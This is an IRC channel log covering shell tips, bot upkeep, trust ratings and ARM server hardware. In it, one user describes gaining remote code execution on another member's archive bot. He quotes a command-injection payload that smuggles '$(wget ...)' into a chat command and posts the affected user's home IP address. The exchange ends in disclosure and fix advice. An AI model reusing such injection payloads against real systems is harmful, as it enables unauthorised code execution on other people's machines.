Hide Idle (>14 d.) Chans


← 2018-04-02 | 2018-04-04 →
lobbes: finally sat down and learned some basic sed commands. I especially love the ability to chose an alternate delimiter; makes certain cases of escaping characters a breeze!
lobbes currently hacking a script to convert all the absolute references in my downloaded kibo.com to relative
mircea_popescu: yep. %%% is better than ///
lobbes: turns out the whole kibo site is only 40 mb or so, so I figured I'd try and mirror the whole thing (after browsing it last night, I realized that the meta aspects of the site are part of the fun)
lobbes: plaintext dun do it justice
trinque suddenly regrets whatever space unescaping \/ is taking up in his skull.
mircea_popescu: lobbes here's a bonus : suppose you have a lengthy file (such as say a server log) and you want to extract just one column. you got awk : cat hurr.txt | awk '{print $3}' (and -F will set the delimiter if space's no good).
mircea_popescu: trinque i despise tools that make you escape. really, it's fucking dumb, let the metachar be settable so i can not need it.
mircea_popescu: and now consider something like cat *** | grep "data.maryland.gov" | awk '{print $19..$22}' | sort -u << "get me the fields 19th through 22nd, once only, and sorted alphabetically".
mircea_popescu: sed + awk are the excel of posix.
mircea_popescu: and as it has to be said : you are not a man until you've played a browser game through curl, pipe and awk/sed.
mimisbrunnr: Logged on 2018-04-02 16:54 mircea_popescu: we just discussed this ; s.nsa is at the most selling one of the two spares. ill run the numbers later an' give you an aye or nay.
mircea_popescu: still working on it.
mircea_popescu: "In March 2018, the blog had 7,556 page views and I made $27.09!!"
mircea_popescu: and in case anyone is missing the usagi era of bitcoin, it didn't end, it just moved on : http://behindmlm.com/companies/empower-network/david-wood-claims-he-can-heal-cancer-herpes-hiv-aids-diabetes/
ben_vulpes: !!v 6214E787A837E6749DEE8709D2234A274FC8637BF1975414A17E6750FA2FAC26
deedbot: ben_vulpes updated rating of shinohai from 1 to -1 << ran off and took a rather useful tool with him
ben_vulpes: anyone want to buy some electronics off amazon for me, get reimbursed in btc?
shinohai: logs.bvulpes.com/trilema?d=2018-4-3#324450 <<< have used your script, and it's former incantaion from years ago - very useful things. My solution thus far is simply running a binhost locally, which is temporary as I try to tweak recipe for amd64.
mimisbrunnr: Logged on 2018-04-03 01:03 trinque: but, I would recommend a student go build his own by hand. doing so by reading my script would be fine, so long as you research every line to understand why that step was done.
shinohai: Also, trinque is your www of wot not updating at this time?
shinohai: Which brings me to:
shinohai: http://logs.bvulpes.com/trilema?d=2018-4-3#324610 <<< I'm sorry, been working on my new book "How to set chmod permissions in under 1 minute so users can log into their shell, and other things isp ops should know!" .... but I'll look into that as time permits.
mimisbrunnr: Logged on 2018-04-03 07:28 ben_vulpes: !!v 6214E787A837E6749DEE8709D2234A274FC8637BF1975414A17E6750FA2FAC26
shinohai: Have a great day #trilema!
shinohai: Nos veremos despues.
douchebag: hey guys
douchebag: I think I got remote code execution on someones box
douchebag: the IP address begins with 174.108
douchebag: If that's one of you, please contact me and I will help you resolve this issue
mod6: mornin!
mod6: shinohai, if you could bring that thing that'd be nice.
mod6: meanwhile, we should probably replace that bot functionality asap. we need a way to get VWAP recorded in here daily.
lobbes: I think shinohai was going to try and send me tars of jhvh1 sometime >> http://btcbase.org/log/2018-03-24#1789503
a111: Logged on 2018-03-24 00:50 shinohai: I can tar the plugins up for you if you need 'em.
lobbes: either way, I'll try and slap up a vanilla gribble on my pizarro shell later this night
lobbes: how much fiat are we talkin'? If it is roughly under $500 I would be very interested >> http://btcbase.org/log/2018-04-03#1792246
a111: Logged on 2018-04-03 08:00 ben_vulpes: anyone want to buy some electronics off amazon for me, get reimbursed in btc?
lobbes bbl; off to the saltmines
ben_vulpes: grade a smarm
ben_vulpes: lobbes: mk i'll letcha know
douchebag: Hey, would you guys be able to show me up a pizarro shell for trb?
a111: Logged on 2018-04-03 04:27 mircea_popescu: asciilifeform http://p.bvulpes.com/pastes/FQiv2/?raw=true
asciilifeform: http://btcbase.org/log/2018-04-03#1792259 << neither mine nor anyone i know of
a111: Logged on 2018-04-03 12:39 douchebag: the IP address begins with 174.108
asciilifeform: http://btcbase.org/log/2018-04-03#1792258 << this pic is distinctly uninformative , i'd like to note
a111: Logged on 2018-04-03 12:39 douchebag: https://i.imgur.com/pPZlvQC.png
douchebag: asciilifeform: Basically last night I was sending commands in the bot that would lead to remote code execution
douchebag: The code execution being wget the url provided in case of blind RCE
asciilifeform: douchebag: ok, so carry on, put up a goatse on deedbot.org or whatever you normally do
douchebag: well it isn't deedbots IP
asciilifeform: tho the moar likely explanation is that trinque read the machine log, and, laughing, went to look at what was in yer intended payload url
asciilifeform: but i'll let him answer this one.
douchebag: Yeah I figured that was a possibility, I just figured I would mention that incase the code did get executed by anything unintentionally
asciilifeform: this is possibly foreign concept in 'web' world, but over here in the adult world people , for instance, read logs. every day.
asciilifeform: and uudecode payloads, deobfuscate js , whatever.
asciilifeform: ( and typically very disappointing, usually quite uninspiring, stale '1000-days' )
asciilifeform: http://btcbase.org/log/2018-04-03#1792252 << there is still time to turn back from nubbinsing, shinohai
a111: Logged on 2018-04-03 12:30 shinohai: http://logs.bvulpes.com/trilema?d=2018-4-3#324610 <<< I'm sorry, been working on my new book "How to set chmod permissions in under 1 minute so users can log into their shell, and other things isp ops should know!" .... but I'll look into that as time permits.
mimisbrunnr: Logged on 2018-04-03 07:28 ben_vulpes: !!v 6214E787A837E6749DEE8709D2234A274FC8637BF1975414A17E6750FA2FAC26
asciilifeform: douchebag: consider, 174.108. is a konsoomer cable isp in usa .
asciilifeform: ('time-warner' co. )
trinque: douchebag: that is not any of my IPs
trinque: what'd you do that got it to belch?
douchebag: no clue, I just checked the logs and saw that lolz.txt was grabbed via wget
trinque: auditor: "says here you talk like a fag, and your shit's all retarded"
shinohai: http://logs.bvulpes.com/trilema?d=2018-4-3#324728 << one could also behave a bit more becoming of a "Lord" and wait until official defrocking occurs before leading the negrate charge?
mimisbrunnr: Logged on 2018-04-03 15:01 asciilifeform: http://btcbase.org/log/2018-04-03#1792252 << there is still time to turn back from nubbinsing, shinohai
trinque: douchebag: I'm asking what the test was, which involved lolz.txt
asciilifeform: shinohai: ben_vulpes made the reason for his neg quite unmysterious, imho
shinohai: but i like salt, my popcorn has been a bit bland of late.
shinohai: ben_vulpes is also aware *why* checking if bot is in #trilema these days is kinda low on list of priorities, as i am in field and only read logs.
shinohai: I don't see join/parts
douchebag: trinque: I was just issuing commands to the bot
douchebag: And I saw the file actually was requested with wget from an IP address I did not recognize
trinque: yeah I followed that part the first time
douchebag: Okay so what's the question?
trinque: after which command did you get a boop
douchebag: I have no clue - I woke up this morning and saw it in the logs
douchebag: I tried a number of different requests
douchebag: i mean commands
trinque: gpg me the full IP?
shinohai: I mean, i still can't play eulora because minigame.bz/ hasn't a server, but i certainly didn't negrate the lot of the #pizarro folks.
trinque: shinohai: weren't you running a bot?
trinque: instead of whining about it, why not bring back said bot
shinohai: yup and it shall rejoin as soon as i get back @ desk. my apologies for inconvenience
shinohai: whining indeed.
trinque: yes, whining. indeed.
BingoBoingo: <mircea_popescu> so this upscale local market ("automercado") that stocks all the shit i buy and consequently got a multi-mn monthly account came up with the very dubious idea of running a promotion. one of those things where you get stickers with your receipt and then you fill a book ? in the terms of the master provisioneer, "they'll rue the day!". i think she's got like twenty of the things all lined up. << Here "automercados" are
BingoBoingo: roughly convenience stores. The servicios tend to have better sandwiches
ben_vulpes: !!v A4C82702BD7A91BE63B8838DB2164C2B2BC39E9F99B411FB0EEDB8D2192D1F3F
deedbot: ben_vulpes unrated shinohai.
BingoBoingo: douchebag: When are some Qntra submissions incoming?
douchebag: I can have some ready tonight if you can link me to where qntra shares are traded
douchebag: last time I tried looking there were so broken links
ben_vulpes: http://logs.bvulpes.com/trilema?d=2018-4-3#324745 << you have it backwards; how i behave defines lordship and lo i got my way
mimisbrunnr: Logged on 2018-04-03 15:20 shinohai: http://logs.bvulpes.com/trilema?d=2018-4-3#324728 << one could also behave a bit more becoming of a "Lord" and wait until official defrocking occurs before leading the negrate charge?
mimisbrunnr: Logged on 2018-04-03 15:01 asciilifeform: http://btcbase.org/log/2018-04-03#1792252 << there is still time to turn back from nubbinsing, shinohai
BingoBoingo: douchebag: On MPEx, there's proxy issues being sorted out. Sometimes the proxies run away and MP has to chain them back to his Ex
BingoBoingo: In other news, the nose is mostly under control. South American cold still has my energy rather zapped. The Incan nurse however did apologize last night.
asciilifeform: hey BingoBoingo , possibly i already asked this a while back and then lost -- but plox to gpg me a postage addr where you can get mail. i want to try experiment.
ben_vulpes: hola mircea_popescu
asciilifeform: danke BingoBoingo
BingoBoingo: asciilifeform: Remember, nothing of incredible value. I am still awaiting a birthday card from February.
BingoBoingo: Buenas Tardes
asciilifeform: and yes BingoBoingo i did think of the item you mentioned, and already prepared it, it ought to satisfy
asciilifeform: ohai mircea_popescu
trinque: douchebag: consider that if you figure out which box responded to you, you at the very least can improve some Lord's bot for him, maybe lobbes' archivebot slurped it? At best, (if it was done in PM), you've got something else listening in, slurping things up.
trinque: that latter would be a mighty interesting blog post
BingoBoingo: trinque: Remember the "Reddit Police" DDoS bot?
trinque: naw
BingoBoingo: That was 2014-ish
BingoBoingo: Roughly coincided with the GAW miners drama.
mircea_popescu: http://btcbase.org/log/2018-04-03#1792252 << lol wait, is he on the list of pizarro victims, with thewhet, minigame an' so on ? or what dramas am i missing here ?
a111: Logged on 2018-04-03 12:30 shinohai: http://logs.bvulpes.com/trilema?d=2018-4-3#324610 <<< I'm sorry, been working on my new book "How to set chmod permissions in under 1 minute so users can log into their shell, and other things isp ops should know!" .... but I'll look into that as time permits.
mimisbrunnr: Logged on 2018-04-03 07:28 ben_vulpes: !!v 6214E787A837E6749DEE8709D2234A274FC8637BF1975414A17E6750FA2FAC26
mircea_popescu: BingoBoingo i remember a "bitcoin police" lol ?
mircea_popescu: (they, self-importantly, didn't want to give self up to #b-a, because of course http://trilema.com/and-in-todays-lulz-the-obnoxious-cocksucker )
BingoBoingo: mircea_popescu: Maybe that's what it was.
mircea_popescu: http://btcbase.org/log/2018-04-03#1792250 << iirc they were compiled once a day.
a111: Logged on 2018-04-03 12:29 shinohai: Also, trinque is your www of wot not updating at this time?
trinque: correct, cronulated
ben_vulpes: http://logs.bvulpes.com/trilema?d=2018-4-3#324705 << do you not have a machine capable of building trb?
mimisbrunnr: Logged on 2018-04-03 14:25 douchebag: Hey, would you guys be able to show me up a pizarro shell for trb?
douchebag: My machines are capable but if I'm going to be running a node, it would probably be best to have a dedicated VPS to do so
mircea_popescu: douchebag generally it runs on actual dedicated machines, rather than vps.
mircea_popescu: http://btcbase.org/log/2018-04-03#1792263 << it's all random numbers anyways.
a111: Logged on 2018-04-03 12:51 mod6: meanwhile, we should probably replace that bot functionality asap. we need a way to get VWAP recorded in here daily.
douchebag: Ahh okay
BingoBoingo: douchebag: The added value in running more nodes is generally spreading the network geographically, etc. There's little value in adding yet another nominal node to the same box or AWS freakshow
mircea_popescu: http://btcbase.org/log/2018-04-03#1792259 << did this ever come to anything then ?!
a111: Logged on 2018-04-03 12:39 douchebag: the IP address begins with 174.108
mircea_popescu: douchebag dood is building the UCI before we even have it lmao.
douchebag: UCI?
mircea_popescu: "universal computing interface"
trinque put a rather beefy node in the pizarro rack at 161.0.121.250
trinque: 376103 and counting
douchebag: Oh also
mircea_popescu: asciilifeform the pic shows that he got "something" to load a file from his filehost. supports the theory that has rce, if he can run wget he can run plenty.
douchebag: When I geoip'd that IP adddress
mircea_popescu: (consider, the way linux works today, if i can run wget as a user i can take the box, the memory leaks.)
asciilifeform: nobody seems to know who or what ran the wget
mircea_popescu: wget WILL time the netcard for you, the netcard has dma, that's the wholew story.
mircea_popescu: asciilifeform well, some ip apparently. i dunno, going through teh logs.
asciilifeform: asciilifeform's observation was that every idjit crapartist probing an asciilifeform-tended box , ever, without exception thought 'ooh, my wget ran' when asciilifeform reads log , and then , on specially-designated box, manually probes back & grabs payload
asciilifeform: ... but in this case, wasn't mine. and, interestingly, apparently not trinque either
mircea_popescu: this is a theory we can easily verify. douchebag write f2c26beed4 on the boxes' tits or something. can you get it reliably ?
mircea_popescu: not entirely intractable to discern whether human is involved or not.
asciilifeform: aha, supposing replicable
mircea_popescu: time will tell you everything.
douchebag: I need to get the boxes full IP
douchebag: Actually, I exited out of that - I'm able to retrieve it but I need to know the proper request to send. waiting on a response from that right now
mircea_popescu: the proper who ?
mircea_popescu: douchebag do you use screen, incidentally ?
mircea_popescu: a ok then.
douchebag: I did do a reverse search on that IP address though
douchebag: It seemed to be out of North Carolina if I remember correctly
lobbes is slowly assembling parts for his own home trb node. Waiting on replacement cpu fan to come in atm. Updates to follow!
douchebag: 174.108.31.15
douchebag: ^ Full IP
mircea_popescu has noticed over the years that the usage of screen is a sort of pons asinorum in computer usage. like the oil rag cloth in a car distinguishes pisi tourist from the driver who actually maintains the machinery ; or like condoms on the nightstand distinguish the woman from the girl and so on.
lobbes: Re: douchebag's recent wget payload: I can confirm that it most likely wasn't my archivebot. The bot doesn't download links directly, it stores list of urls found in chan and forwards them to the archive.is submit form
mircea_popescu: http://btcbase.org/log/2018-04-03#1792286 << i very well fucking don't. jesus christ, 1mn+ lines/day, god help me. i catgrep the item now and again, but the odds of me noticing something in there are pretty slim.
a111: Logged on 2018-04-03 15:07 asciilifeform: this is possibly foreign concept in 'web' world, but over here in the adult world people , for instance, read logs. every day.
asciilifeform: y'know it's still 'read' if you put it through meatgrinder
mircea_popescu: but very distantly read. it's a perl meatgrinder, i'm sure it misses most of the meat.
mircea_popescu: douchebag looks like a home ip. \
mircea_popescu: vulnerable home computers are pestilentially common ; did you get to the portion in the logs where we logged into a shitton of servers administering solar panels ?
mircea_popescu: http://btcbase.org/log/2018-04-03#1792296 << oh don't be silly. i now concur with alf, this is no indication of anything yet. get it to do it systematically, in reaction to something you control, THEN you have maybe something.
a111: Logged on 2018-04-03 15:24 douchebag: no clue, I just checked the logs and saw that lolz.txt was grabbed via wget
mircea_popescu: http://btcbase.org/log/2018-04-03#1792298 << what do these two have to do with each other anyway. there should be a difference between doing wrong and not doing enough. not every burgher can be in the town council, that dun mean he's bankrupt now or something, what the hell.
a111: Logged on 2018-04-03 15:29 shinohai: http://logs.bvulpes.com/trilema?d=2018-4-3#324728 << one could also behave a bit more becoming of a "Lord" and wait until official defrocking occurs before leading the negrate charge?
mimisbrunnr: Logged on 2018-04-03 15:01 asciilifeform: http://btcbase.org/log/2018-04-03#1792252 << there is still time to turn back from nubbinsing, shinohai
douchebag: It it okay if I test this payload again right now
douchebag: To see if I get another pingback
mircea_popescu: i don't see why not.
BingoBoingo: Best case it's just the FBI and they are too busy chasing imaginary Russians to notice you walking away with their server
douchebag: Alright, give me a moment I just didn't want to bother anyone with my payloads
lobbes: douchebag aha I think that is my home ip. Plox do test payload again
douchebag: Oh shit, and you never manually ran wget on that IP
douchebag: ????
douchebag: or on the link???
lobbes: Actually, when was this? I think I may hace manually wgot
lobbes: *have
douchebag: last night
douchebag: vjiayxgdlqk1veovjxso63g6ixopce.burpcollaborator.net
douchebag: on something that looked like that
lobbes: Hmm interesting. Yeah this was a few weeks ago iirc when I curiously grabbed one of yer payloads via wget
douchebag: yeah no dude
douchebag: If you didn't do this last night
douchebag: I got remote code execution on your box
douchebag: Can you send me links to the scripts ?
douchebag: I'll show you how to fix it
lobbes: Also not 100% positive if that was my home ip, but charlotte nc is my residence. I'll confirm that tonight
douchebag: So lobbes
douchebag: Are any of these things being manually passed into bash commands
douchebag: here lets see something
douchebag: lobbes: How often does the bot search ?
lobbes: the bot operates from an external vps (not my home ip). Shoves urls into a db which my home box downloads and then passes eaxh one to archive.is.
douchebag: and how are you passing these to archive.is
lobbes: That is done through a process where a python script reads from (ahhh now I think I see where it may remotely execute) db and passes url via bash to a phantomjs script which submits to archive.is
douchebag: Hahaha
douchebag: Awesome
douchebag: Well for me at least
douchebag: For you, I really do suggest fixing that
lobbes: I'll dig more into it tonight once I'm in front of it all
douchebag: Because if I was a blackhat I could have pwned ur home box
lobbes: Yeah really. Thank you for uncovering this (I am n00b, you will soon learn)
douchebag: No problem man, just glad I could help!
lobbes: Likewise, I'll give ya a favorable rating once in front of my gpg key
douchebag: Sounds like a plan
trinque: wd douchebag
douchebag: thx <3
mircea_popescu: lobbes fwiw this is very poor design.
lobbes: Oya. Hey, this is the peril of "learning as you go"
lobbes: What would you suggest as a better design? Obvs no passing urls via bash
mircea_popescu: why is your home box doing work that's not directed at you ?
mircea_popescu: conceptually, if it's talking to you it's an infangwif ; if it's talking to the outside it's an outsidewif. why are you fucking streetwalkers / sending the wife to walk the streets ?
mircea_popescu: when you say "home box", what do you even mean ?
douchebag: lobbes: If you want to make a secure application, consider all user input as malicious
douchebag: lobbes
douchebag: Your home machines name is lobbes
douchebag: correct?
lobbes: mircea_popescu: the logs, but it is an old craptop with an ssd dedicated to public toilet Only place I had to store the gbs of archive data.
lobbes: douchebag si
douchebag: RCE confirmed
mircea_popescu: lobbes well fine, but i was discussing teh design as such. there's no rule against "i have a crappy box for a server that's not worth placing in a dc so it sits in garage", sure. nor is there any rule against "i just simplified speech, called it homebox, it's not" -- but what you say is all i have to go on, that's all.
mircea_popescu: douchebag umm, you used his ~browser~ to do this ?!
douchebag: I think it's being passed into bash into a PhantomJS interpreter
lobbes: ^^
lobbes: Man I feel stupid in general
mircea_popescu: !!rated douchebag
deedbot: mircea_popescu rated douchebag 1 at 2018/01/15 07:34:46 << hyde.solutions
mircea_popescu: !!rate douchebag 2 "your home machine's name is lobbes"
douchebag: lobbes: Just make sure whenever you handle any user input, consider all input as potentially malicious
mircea_popescu: ben_vulpes i wasn't initially going to say anything besides "nay" ; but hey, pizarro's a friend of ours, so : nsa would sell the spare machine for cost, which is about .371. comes with two fgs installed and free shipping.
douchebag: and for fucks sake do not pass any user input into a bash interpreter
lobbes: douchebag really though, this has been a wake up call to get my shit together. Ty again
douchebag: Yeah no problem, it was pretty fun to discover
mircea_popescu: !!v 86FC0A4A826976505E6815A4D3677651F10E73948ED9B253C022B65F6C2DFB4E
deedbot: mircea_popescu updated rating of douchebag from 1 to 2 << "your home machine's name is lobbes"
lobbes: Just know, I'm prolly the easiest target here :P
mircea_popescu: i'm not so certain.
mircea_popescu: https://portswigger.net/burp/help/collaborator << that burp thing's not even retarded. runs a dummy server on the side, ns, everything.
mircea_popescu: douchebag do you know who made it ?
douchebag: It's made by a team of people
douchebag: It was originally developed by dafydd portswigger
douchebag: now he has a couple other people working on it, I know ones name is James Kettle
mircea_popescu: did you spring for teh $350 a year thing ?
douchebag: Yeah, well worth it
mircea_popescu: i believe.
douchebag: mircea_popescu: I got 0.01 for perma voice, do I get 0.02 for Remote Command Execution :-D ?
mircea_popescu: lol. i was going to buy you the pro yearly package, actually. but since you already have it, no need :D
douchebag: I appreciate that, feel free to reimburse it though haha
douchebag: Man I lol
lobbes: Anyways, archivetron's url snarf has been temporarily disabled for obvious reasons. Will resume once I plug these holes tonight
lobbes: I'll announce once back up
douchebag: I bet so many bots could be pwned with similar techniques
mircea_popescu: douchebag i'll get you a sever once the pizarro folk unwrap their heads enough to actually have one on offer. so you can tinker on gentoo, trb etc and get out of the "vps" bs hell.
douchebag: A physical serve ?!
douchebag: server*
asciilifeform: hey maybe he will be the test patient for the new arm boxen.
mircea_popescu: douchebag yeah.
mircea_popescu: asciilifeform i dunno he can arm... one thing at a time.
douchebag: Holy shit thanks!!
mircea_popescu: yeah, tell you what, i'll be as happy as you are once it's finally done.
asciilifeform: mircea_popescu: if all he needs is standard unix userland, no reason he couldn't arm.
mircea_popescu: what was on those, i forget ?
asciilifeform: the arm gentoo i am cooking up as we speak.
mircea_popescu: i meant hardware
douchebag: Well, I'm gonna grab a cigarette to aid with this excitement
asciilifeform: ROC-RK3328-CC ( currently building a kernel for it, without the 'evil' periphs )
asciilifeform: chinese thing, they publish schematic , even.
mircea_popescu: but ram hdd etc ?
asciilifeform: the unit i am testing ( will buy a few moar once i'm satisfied that it is usable ) came with 2G. there is a 4G supposedly also in production, but i was not able to obtain it
asciilifeform: hdd is a highspeed SD card , and can be of any size ; there is also a usb3 jack, 480MB/s; and a 1G/s nic.
mircea_popescu: ah so could actually run trb np
asciilifeform: indeed it could
asciilifeform: faster, in principle, even than zoolag
mircea_popescu: this is neat. ok, chuck the largest sd you can find in there an' consider it sold.
asciilifeform: first things first, gotta terraform it.
asciilifeform: then will simply clone the gentoo for each new user ( or he can transmit a SD image , signed , and BingoBoingo will pump it in, plug in a board, and up an' running )
mircea_popescu: douchebag alf lands in the oriental republic sometime mid month ; you'll get your login then, an' your first task will be to get trb up on it ; and the tasks 2 throught 999 will be to have fun.
mircea_popescu: so clear your schedule 2nd half of april for it.
mircea_popescu: asciilifeform i like the model.
asciilifeform: the interesting bit is that these boxen draw ~2 - 5 watt. and are of the physical dimensions of a pack of cards.
asciilifeform: and (unlike e.g. 'raspberry') the full datashits and schems are published.
asciilifeform: chipset is a 'rockchip', i ported trb to it in 2015 iirc.
asciilifeform: (trb, buildroot-kernel, userlands)
asciilifeform: the other interesting pheature of this board is that it has no onboard flash. so nothing to sanitize aside from sdcard.
asciilifeform: ( also comes with audio and video but i do not need these and have not tried'em )
a111: Logged on 2018-04-03 15:33 douchebag: ie: !!send $(wget http://site.com/lolz.txt)
mircea_popescu: http://btcbase.org/log/2018-04-03#1792317 << well conceivably for the same reason alf isn't bringing back phuctor, neh. cuz he doesn't as of yet have where to bring it back from!
a111: Logged on 2018-04-03 15:38 trinque: instead of whining about it, why not bring back said bot
mircea_popescu: http://btcbase.org/log/2018-04-03#1792321 << sounds like local knockoff. this thing only exists in cr, some local entrepreneur (in the proper sense of the term) made a supermarket that actually works.
a111: Logged on 2018-04-03 16:36 BingoBoingo: <mircea_popescu> so this upscale local market ("automercado") that stocks all the shit i buy and consequently got a multi-mn monthly account came up with the very dubious idea of running a promotion. one of those things where you get stickers with your receipt and then you fill a book ? in the terms of the master provisioneer, "they'll rue the day!". i think she's got like twenty of the things all lined up. << Here "automercados" are
mircea_popescu: http://btcbase.org/log/2018-04-03#1792327 << yeah, bringing mpex proxies back up is underway.
a111: Logged on 2018-04-03 16:44 douchebag: last time I tried looking there were so broken links
trinque: general point of "nobody wants your head bud, just move in a direction". I guess he had a health problem, which is rough.
lobbes: To wrap back to this discussion, I think I see your point. There's no real reason this craptop needs to deal with the user input at all. All I need it for is to download, store and parse shit download from archive.is. >> http://btcbase.org/log/2018-04-03#17924
a111: Logged on 2013-05-06 02:54 tiberiusiv: miami is not like NYC lol
mircea_popescu: http://btcbase.org/log/2018-04-03#1792332 << with both mouths, one would hope.
a111: Logged on 2018-04-03 16:57 BingoBoingo: In other news, the nose is mostly under control. South American cold still has my energy rather zapped. The Incan nurse however did apologize last night.
asciilifeform: mircea_popescu: s/meet/meat/g in footnote ii in yer latest article
mircea_popescu: lobbes the only important consideration here is that design is not a haphazard activity driven by occurence and circumstance. that's implementation. design is a deductive activity, it proceeds from first principles and does not break faith.
lobbes: Wat a111 misquote?
mircea_popescu: asciilifeform ty
lobbes: mircea_popescu makes sense
mircea_popescu: lobbes you lopped off a digit from the url ; it goes by #17924
lobbes: Ahh that's what happened
mircea_popescu: asciilifeform you know, your page is stale. it was already fixed in the latest version!
BingoBoingo: http://btcbase.org/log/2018-04-03#1792546 << Here it isn't a singluar entity running them. It's what they call gas stations without the gas pumps.
a111: Logged on 2018-04-03 18:37 mircea_popescu: http://btcbase.org/log/2018-04-03#1792321 << sounds like local knockoff. this thing only exists in cr, some local entrepreneur (in the proper sense of the term) made a supermarket that actually works.
douchebag: sounds good
a111: Logged on 2018-04-03 18:38 mircea_popescu: http://btcbase.org/log/2018-04-03#1792332 << with both mouths, one would hope.
BingoBoingo: !!up yangwao
deedbot: yangwao voiced for 30 minutes.
BingoBoingo: !!up yangwao_
deedbot: yangwao_ voiced for 30 minutes.
BingoBoingo: yangwao_: Who is your daddy and what does he do?
lobbes: mircea_popescu: But yeah, I need to think through my designs a bit better. Problem is I'm probably missing some crucial first principles.
mircea_popescu: lobbes on the positive side, this is how they were born in the first place, by people thinking about it. no revelation under the sun.
BingoBoingo: mircea_popescu: Yeah, the Ururuayan things with that string on their signage don't look like that.
lobbes: Perhaps I ought to go through all my existing designs, map them out, and then blog post em for forum critique.
mircea_popescu: lobbes can't hurt anything.
lobbes: True dat. Anyways I'll bbl. Thanks for allowing me to brain pick
a111: Logged on 2018-04-03 17:05 BingoBoingo: asciilifeform: Remember, nothing of incredible value. I am still awaiting a birthday card from February.
BingoBoingo: mircea_popescu: Sent US mail, with "International Stamp" per the sender's description
mircea_popescu: worth trying a fedex type thing
douchebag: later lobbes
asciilifeform: BingoBoingo, mircea_popescu : i learned today, that even shitazon ~will~ ship to BingoBoingoistan, BUT demands about 1 $ to every $ of item ordered , in 'import duty prepay'
douchebag: Do you guys know the specs of the server ?
ben_vulpes: mircea_popescu: is that free shipping to .uy?
asciilifeform: (~on top of~ shipping)
deedbot: http://qntra.net/2018/04/venezuelas-education-minister-eat-less-if-you-want-to-see-food-in-supermarkets/ << Qntra - Venezuela's Education Minister: Eat Less If You Want To See Food In Supermarkets
mircea_popescu: ben_vulpes well yes.
a111: Logged on 2018-04-03 18:27 asciilifeform: ROC-RK3328-CC ( currently building a kernel for it, without the 'evil' periphs )
mircea_popescu: asciilifeform he was asking me not you lol.
asciilifeform thought q was re shitazon-to-uy
douchebag: How would this compare to a raspberry pi ?
asciilifeform: douchebag: similar, but without the closed shitware iron
douchebag: Forsure
mircea_popescu: douchebag it's basically a very fast i/o low cpu power box.
asciilifeform: not even so low -- 4 x 1.4GHz 64bit
mircea_popescu: the republic's de facto moving towards hardware specialization, there's on one hand the very heavy cpu machines (of which sha miners are a subset, phuctor is another, and so on), and then the sort of thing like this, typified by a trb node machine.
mircea_popescu: asciilifeform yeah.
douchebag: Ooh interesting
douchebag: hahaha
douchebag: this is hilarious
douchebag: Just saw this come in
mircea_popescu: as you don't do a lot of numbers churning, it might be tghe perfect item for you. and if not, well, we see.
douchebag: Awesome
spyked: re arm box, /me was considering buying the arm64 olinuxino from teh olimex people. the rockchip board seems very similar (++ on the USB3 port), but I can't seem to find it in the EU.
asciilifeform: spyked: olimex lives in eu
BingoBoingo: douchebag: If you keep impressing and outgrow the ARM thing, there are worse places to vacation after dropping off a box than Uruguay. The best weather here runs December to February though.
mod6: iirc this dude would be coming out of eastern europe.
mod6: instead of the united retards
spyked: asciilifeform yeah I was talking about the ROC-RK3328-CC. it seems a tad beefier than the olimex counterpart. but otherwise yeah, olimex live very close to me, had a board delivered in ~2 days some months ago.
asciilifeform: funnily enuff , it takes typically 3d to usa !
asciilifeform: ( from bulgaria )
asciilifeform buys fairly often from olimex
mircea_popescu: spyked so you can get one from teh pizarro too!
mircea_popescu: mod6 wasn't he in chicago ?
BingoBoingo: Fucking Yankee from upstate
mod6: mircea_popescu: aha, iirc he said he's moving tho
douchebag: I will be in the United States in april
mircea_popescu: he is better than you rural hicks from southern ill!
douchebag: I'm leaving for eastern europe late may
mod6: douchebag: ah just through april tho?
mod6: ah, alright. will keep that in mind.
spyked: mircea_popescu: yeh I'm definitely considering that! the reason I've postponed getting an ARM board at all was the lack of a full-fledged SATA 3 port. I wanna get trb running on arm at some point among others.
mircea_popescu: missoury dunno even what chic is, while chicago had it long ago!
BingoBoingo: <mircea_popescu> he is better than you rural hicks from southern ill! << This is true. At his age I was solidly anti-productive.
mircea_popescu: spyked as described this item would actually make a great node ; whether the practice holds is to be seen in practice.
spyked: also, as a fun-fact: I tried running lispbots on an old first-gen raspberry pi, but it seems SBCL doesn't support threading on ARM (at least not ARMv6 and ARMv7). so I want to test that on ARM64.
asciilifeform: spyked: i found 1st gen raspi (entirely aside the q of closed shitware) to be ~unusable -- it shared a usb bus between nic (already slow) and disk
douchebag: Oh but yeah, until then - let me know if there are any IRC bots or web applications you want me to take a look at
spyked: eh, I ended up using it to host my IRC bouncer. at least it's good enough for that.
phf: spyked: i prefer ccl on low powered machines, the only parts of trinque's bot that rely on sbcl are one or two functions related to thread management
mircea_popescu: phf still though, losing out on threading on a quad machine is a little dumb.
phf: oh, right, that wasn't obvious from what i said, ccl supports multithreading on arms
mircea_popescu: a it does ?
spyked: oh cool
mircea_popescu: i suppose the question of lisp standardization, soon to be visited upon our fair republic, will be one helluva burning flame.
phf: i believe rainer joswig hosts his websites on some arm box with CL-HTTP on top of it
mircea_popescu: spyked a good move at this point i guess would be patching trinque 's bot to be all cll.
mircea_popescu: speaking of pantsuit refraction lulz, https://news.ycombinator.com/item?id=587045
ben_vulpes: mircea_popescu: thanks for extending the counteroffer, i'll take it. will you take payment in pizarro credits?
mircea_popescu: oh, and : lobbes other than the design review, consider lifting the whole of gutenberg into your archive ? the idiots already have a https that is broken, so far http only works but who knows how long.
mircea_popescu: ben_vulpes cash or bonds, though for the latter no actual discount was discussed in teh nsa boardroom. but i guess i'll go with .4 off the cuff and hope nobody throws gavels at me.
trinque uses ccl elsewhere, would glady sign that patch
ben_vulpes: mircea_popescu: works, i'll take it for bonds
mircea_popescu: epic contributions from "paul nakata" (hey, nobody on a stick but has a keybase key), some dork who "programs in cl every day" and the whole menagerie of "nobody told us to shut the fuck up like, ever"
mircea_popescu: ben_vulpes cool. that takes s.nsa pile to .9 if memory serves ?
ben_vulpes: correct you are
spyked: mircea_popescu, it's good timing, since I've been doing some reading ircbot code and comparing with my own implementation. I've actually been contemplating http://btcbase.org/log/2018-02-26#1786288 and rolling my own was not a wholly useless endeavour, i.e. http://trilema.com/2016/how-to-participate-in-the-affairs-of-the-most-serene-republic/#selection-322.0-322.5 so I'll document the whole thing on the blog.
a111: Logged on 2018-02-26 17:11 mircea_popescu: spyked the bot is a solved problem, genesis and all.
